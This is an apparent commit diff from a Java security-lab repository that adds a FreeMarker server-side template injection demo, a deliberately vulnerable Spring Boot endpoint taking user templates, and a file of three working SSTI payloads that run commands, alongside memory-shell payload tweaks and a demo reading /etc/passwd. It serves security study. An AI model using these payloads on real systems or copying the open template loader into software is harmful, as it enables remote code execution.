add SSTI :)

Author: Whoopsunix

FilesOperations/src/main/java/org/example/FileRead.java

@@ -7,6 +7,11 @@
  * @author Whoopsunix
  */
 public class FileRead {
+    public static void main(String[] args) throws Exception {
+        String s = read_InputStreamReader_BufferedInputStream("/etc/passwd");
+        System.out.println(s);
+    }
+
     /**
      * abstract java.io.Reader
      * java.io.InputStreamReader
@@ -81,6 +86,20 @@ public String read_InputStreamReader_text(String str) throws Exception {
         return content.toString();
     }
 
+    public static String read_InputStreamReader_BufferedInputStream(String filePath) throws Exception {
+        FileInputStream fileInputStream = new FileInputStream(filePath);
+        BufferedInputStream bufferedInputStream = new BufferedInputStream(fileInputStream);
+        byte[] buf = new byte[1024];
+        int len;
+        OutputStream outputStream = new ByteArrayOutputStream();
+        while ((len = bufferedInputStream.read(buf)) > 0) {
+            outputStream.write(buf, 0, len);
+        }
+        outputStream.close();
+        bufferedInputStream.close();
+        return outputStream.toString();
+    }
+
     // java.io.FileInputStream
     public String read_FileInputStream(String filePath) {
         String content = "";

JavaClass.http

@@ -31,7 +31,7 @@ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0g
 Content-Disposition: form-data; name="file"; filename="cc4.bin"
 Content-Type: application/octet-stream
 
-< ./dev/test.bin
+< ./dev/result.bin
 #< ./dev/TomcatExecutorThreadLoader.bin
 #< ./dev/TomcatListenerThreadMS.bin
 ------WebKitFormBoundary7MA4YWxkTrZu0gW--

MemShellAndRceEcho/JakartaJettyDemo/pom.xml

@@ -12,11 +12,6 @@
             <groupId>org.eclipse.jetty</groupId>
             <artifactId>jetty-webapp</artifactId>
             <version>11.0.0</version>
-<!--            <version>10.0.0</version>-->
-<!--            <version>9.0.0.M0</version>-->
-<!--            <version>8.0.0.M0</version>-->
-<!--            <version>7.1.0.RC0</version>-->
-<!--            <version>7.0.0.M0</version>-->
         </dependency>
 
         <dependency>

MemShellAndRceEcho/JakartaTomcatDemo/pom.xml

@@ -32,6 +32,14 @@
             <artifactId>commons-collections4</artifactId>
             <version>4.0</version>
         </dependency>
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <!--<version>3.1</version>-->
+            <!--            <version>3.2</version>-->
+            <version>3.2.1</version>
+            <!--            <version>3.2.2</version>-->
+        </dependency>
 
         <dependency>
             <groupId>org.ppp.tools</groupId>

MemShellAndRceEcho/JavaxJettyDemo/src/main/java/org/example/jetty/utils/PayloadMake.java

@@ -1,47 +1,47 @@
-package org.example.jetty.utils;
-
-import me.gv7.tools.josearcher.entity.Blacklist;
-import me.gv7.tools.josearcher.entity.Keyword;
-import me.gv7.tools.josearcher.searcher.SearchRequstByBFS;
-import org.example.jetty.memshell.JettyListenerThreadLoader;
-import org.ppp.tools.ser.CC4Generator;
-
-import java.util.ArrayList;
-import java.util.List;
-
-/**
- * @author Whoopsunix
- */
-public class PayloadMake {
-    public static void main(String[] args) throws Exception {
-        cc4();
-    }
-
-    public static void cc4() throws Exception {
-        Class msmClass = JettyListenerThreadLoader.class;
-        CC4Generator cc4Generator = new CC4Generator();
-        String payload = cc4Generator.make(msmClass);
-        System.out.println(payload.length());
-        cc4Generator.makeFile(msmClass, "dev/test.bin");
-    }
-
-    public void searchJetty() {
-        //设置搜索类型包含Request关键字的对象
-        List<Keyword> keys = new ArrayList<>();
-        keys.add(new Keyword.Builder().setField_type("Request").build());
-        //定义黑名单
-        List<Blacklist> blacklists = new ArrayList<>();
-        blacklists.add(new Blacklist.Builder().setField_type("java.io.File").build());
-        //新建一个广度优先搜索Thread.currentThread()的搜索器
-        SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(), keys);
-        // 设置黑名单
-        searcher.setBlacklists(blacklists);
-        //打开调试模式,会生成log日志
-        searcher.setIs_debug(true);
-        //挖掘深度为20
-        searcher.setMax_search_depth(20);
-        //设置报告保存位置
-        searcher.setReport_save_path("/tmp/");
-        searcher.searchObject();
-    }
-}
+//package org.example.jetty.utils;
+//
+//import me.gv7.tools.josearcher.entity.Blacklist;
+//import me.gv7.tools.josearcher.entity.Keyword;
+//import me.gv7.tools.josearcher.searcher.SearchRequstByBFS;
+//import org.example.jetty.memshell.JettyListenerThreadLoader;
+//import org.ppp.tools.ser.CC4Generator;
+//
+//import java.util.ArrayList;
+//import java.util.List;
+//
+///**
+// * @author Whoopsunix
+// */
+//public class PayloadMake {
+//    public static void main(String[] args) throws Exception {
+//        cc4();
+//    }
+//
+//    public static void cc4() throws Exception {
+//        Class msmClass = JettyListenerThreadLoader.class;
+//        CC4Generator cc4Generator = new CC4Generator();
+//        String payload = cc4Generator.make(msmClass);
+//        System.out.println(payload.length());
+//        cc4Generator.makeFile(msmClass, "dev/test.bin");
+//    }
+//
+//    public void searchJetty() {
+//        //设置搜索类型包含Request关键字的对象
+//        List<Keyword> keys = new ArrayList<>();
+//        keys.add(new Keyword.Builder().setField_type("Request").build());
+//        //定义黑名单
+//        List<Blacklist> blacklists = new ArrayList<>();
+//        blacklists.add(new Blacklist.Builder().setField_type("java.io.File").build());
+//        //新建一个广度优先搜索Thread.currentThread()的搜索器
+//        SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(), keys);
+//        // 设置黑名单
+//        searcher.setBlacklists(blacklists);
+//        //打开调试模式,会生成log日志
+//        searcher.setIs_debug(true);
+//        //挖掘深度为20
+//        searcher.setMax_search_depth(20);
+//        //设置报告保存位置
+//        searcher.setReport_save_path("/tmp/");
+//        searcher.searchObject();
+//    }
+//}

MemShellAndRceEcho/ResinDemo/src/main/java/org/example/resin/utils/PayloadMake.java

@@ -22,7 +22,7 @@ public static void cc4() throws Exception {
         CC4Generator cc4Generator = new CC4Generator();
         String payload = cc4Generator.make(ResinServletExecMS.class);
         System.out.println(payload.length());
-        cc4Generator.makeFile(ResinServletExecMS.class, "cc4.bin");
+        cc4Generator.makeFile(ResinServletExecMS.class, "dev/result.bin");
     }
 
     public void searchResin() {

README.md

@@ -43,6 +43,7 @@ By. Whoopsunix
   - [Snakeyaml](#snakeyaml)
 - [0x07 文件读写 Demo](#0x07-文件读写-demo)
 - [0x08 XXE 有回显测试 Demo](#0x08-xxe-有回显测试-demo)
+- [0x09 SSTI](#0x09-ssti-freemarker)
 - [鸣谢](#Thanks)
 
 # 0x01 [RceEcho & MemShell](MemShellAndRceEcho)
@@ -268,6 +269,8 @@ JDBC 序列化的知识可以参考这些项目 [JDBC-Attack](https://github.com
 
 测试 JDK 原生的 XXE Demo 时最好将 pom 引入的依赖注释掉，idea 调试时容易出问题进不到想要的 hook 点 
 
+# 0x09 [SSTI FreeMarker](SSTI)
+
 # Stats
 
 ![Alt](https://repobeats.axiom.co/api/embed/818a4d2c0d1562eec751b2637b825b3b0d2cf0e3.svg "Repobeats analytics image")

SSTI/pom.xml

@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <artifactId>SSTI</artifactId>
+    <name>SSTI</name>
+    <description>SSTI</description>
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>1.5.8.RELEASE</version>
+    </parent>
+
+    <properties>
+        <java.version>1.7</java.version>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-freemarker</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.python</groupId>
+            <artifactId>jython-standalone</artifactId>
+            <!--            <version>2.5.2</version>-->
+            <version>2.7.3</version>
+        </dependency>
+    </dependencies>
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+        </plugins>
+    </build>
+</project>

SSTI/src/main/java/com/ppp/ssti/HelloController.java

@@ -0,0 +1,45 @@
+package com.ppp.ssti;
+
+import freemarker.cache.MultiTemplateLoader;
+import freemarker.cache.StringTemplateLoader;
+import freemarker.cache.TemplateLoader;
+import freemarker.template.Configuration;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.stereotype.Controller;
+import org.springframework.ui.Model;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+
+import java.io.IOException;
+import java.util.Map;
+
+@Controller
+public class HelloController {
+
+    @Autowired
+    private  Configuration con;
+
+    @GetMapping("/")
+    public String index() {
+        return "index";
+    }
+
+    @RequestMapping(value = "/hello")
+    public String hello(@RequestBody Map<String,Object> body, Model model) {
+        model.addAttribute("name", body.get("name"));
+        return "hello";
+    }
+
+    @RequestMapping(value = "/template", method =  RequestMethod.POST)
+    public String template(@RequestBody Map<String,String> templates) throws IOException {
+        StringTemplateLoader stringLoader = new StringTemplateLoader();
+        for(String templateKey : templates.keySet()){
+            stringLoader.putTemplate(templateKey, templates.get(templateKey));
+        }
+        con.setTemplateLoader(new MultiTemplateLoader(new TemplateLoader[]{stringLoader,
+            con.getTemplateLoader()}));
+        return "index";
+    }
+}

SSTI/src/main/java/com/ppp/ssti/Poc.http

@@ -0,0 +1,42 @@
+###
+# 触发命令
+POST /hello HTTP/1.1
+Host: 127.0.0.1:8080
+Content-Type: application/json
+
+{
+  "name": "John"
+}
+
+###
+# POC1 利用 freemarker.template.utility.Execute.exec()  调用 Runtime.getRuntime().exec() 执行
+POST /template HTTP/1.1
+Host: 127.0.0.1:8080
+Content-Type: application/json
+
+{
+	"hello.ftl": "<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"open -a Calculator\")}"
+}
+
+
+###
+# POC2 利用 freemarker.template.utility.ObjectConstructor.exec() 调用 newInstance() 执行
+POST /template HTTP/1.1
+Host: 127.0.0.1:8080
+Content-Type: application/json
+
+{
+  "hello.ftl": "<#assign value=\"freemarker.template.utility.ObjectConstructor\"?new()>${value(\"java.lang.ProcessBuilder\",\"open\",\"-a\",\"Calculator\").start()}"
+}
+
+###
+# POC3 利用 freemarker.template.utility.JythonRuntime 调用 org.python.core.PrePy.getCommandResult() 执行 java.lang.ProcessBuilder
+POST /template HTTP/1.1
+Host: 127.0.0.1:8080
+Content-Type: application/json
+
+{
+  "hello.ftl": "<#assign value=\"freemarker.template.utility.JythonRuntime\"?new()><@value>import os;os.system(\"open -a Calculator\")</@value>"
+}
+
+

SSTI/src/main/java/com/ppp/ssti/WebApplication.java

@@ -0,0 +1,12 @@
+package com.ppp.ssti;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class WebApplication {
+    public static void main(String[] args) throws Exception {
+        SpringApplication.run(WebApplication.class, args);
+    }
+}
+

SSTI/src/main/resources/application.properties

@@ -0,0 +1,2 @@
+spring.freemarker.template-loader-path: classpath:/templates
+spring.freemarker.suffix: .ftl

SSTI/src/main/resources/static/css/main.css

@@ -0,0 +1,3 @@
+.hello-title{
+    color: darkgreen;
+}

SSTI/src/main/resources/static/js/main.js

@@ -0,0 +1,3 @@
+(function(){
+    console.log("Hello World!");
+})();

SSTI/src/main/resources/templates/hello.ftl

@@ -0,0 +1,12 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <title>Hello ${name}!</title>
+    <link href="/css/main.css" rel="stylesheet">
+</head>
+<body>
+    <h2 class="hello-title">Hello ${name}!</h2>
+    <script src="/js/main.js"></script>
+</body>
+</html>

SSTI/src/main/resources/templates/index.ftl

@@ -0,0 +1,12 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <title>Spring Boot Hello World Example with FreeMarker - SSTI demo</title>
+    <link href="/css/main.css" rel="stylesheet">
+</head>
+<body>
+    <h2 class="hello-title">Spring Boot Hello World Example with FreeMarker - SSTI demo</h2>
+    <script src="/js/main.js"></script>
+</body>
+</html>